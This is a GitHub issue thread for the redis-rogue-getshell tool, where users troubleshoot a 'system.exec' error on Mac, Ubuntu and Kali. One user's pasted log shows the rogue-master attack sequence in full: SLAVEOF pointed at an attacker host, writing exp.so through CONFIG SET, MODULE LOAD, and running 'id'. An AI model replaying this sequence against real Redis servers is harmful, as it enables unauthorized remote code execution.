redis-rogue-getshell icon indicating copy to clipboard operation
redis-rogue-getshell copied to clipboard

-ERR unknown command `system.exec`, with args beginning with: `id

Open super1-chen opened this issue 5 years ago • 7 comments

I installed you tool on my mac (Darwin albert.local 18.7.0 Darwin Kernel Version 18.7.0: Mon Apr 27 20:09:39 PDT 2020; root:xnu-4903.278.35~1/RELEASE_X86_64 x86_64) and run command as you document with Python 3.7.7, then I got logs as below, could you give me some suggestions, Thank you

>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$12\r\n10.20.29.148\r\n$4\r\n8888\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'*1\r\n$4\r\nPING\r\n'
>> receive data: b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$5\r\n56379\r\n'
>> receive data: b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
>> receive data: b'*3\r\n$5\r\nPSYNC\r\n$40\r\n204811cefd7bc080eb8d5bb9686d6a3981fbd8d0\r\n$1\r\n1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
>> receive data: b'-ERR Error loading the extension. Please check the server logs.\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n'
>> receive data: b'-ERR unknown command `system.exec`, with args beginning with: `id`, \r\n'
-ERR unknown command `system.exec`, with args beginning with: `id`,

>> send data: b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
>> receive data: b'-ERR Error unloading module: no such module with that name\r\n'

super1-chen avatar Jul 08 '20 01:07 super1-chen

I run the command on centos 7 (Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux) every thing is ok

super1-chen avatar Jul 08 '20 02:07 super1-chen

应该是扩展so的问题,可以在Linux上编译好一个exp.so,放到mac系统下,再执行。

phith0n avatar Jul 08 '20 05:07 phith0n

我在ubuntu(2020.3)系统上执行这个脚本,也出现了同样的情况

wuzuowei avatar Dec 29 '20 07:12 wuzuowei

我在ubuntu(2020.3)系统上执行这个脚本,也出现了同样的情况

如果加载so不成功都会出现这个错误,并不能说明你们遇到的同一个问题,还是需要自己深入研究具体原因。

phith0n avatar Dec 29 '20 13:12 phith0n

我在ubuntu(2020.3)系统上执行这个脚本,也出现了同样的情况

如果加载so不成功都会出现这个错误,并不能说明你们遇到的同一个问题,还是需要自己深入研究具体原因。

好的,老哥,我再看看

wuzuowei avatar Dec 30 '20 09:12 wuzuowei

在kali上 编译 执行命令 也提示此错误

Naturehi666 avatar Oct 13 '22 06:10 Naturehi666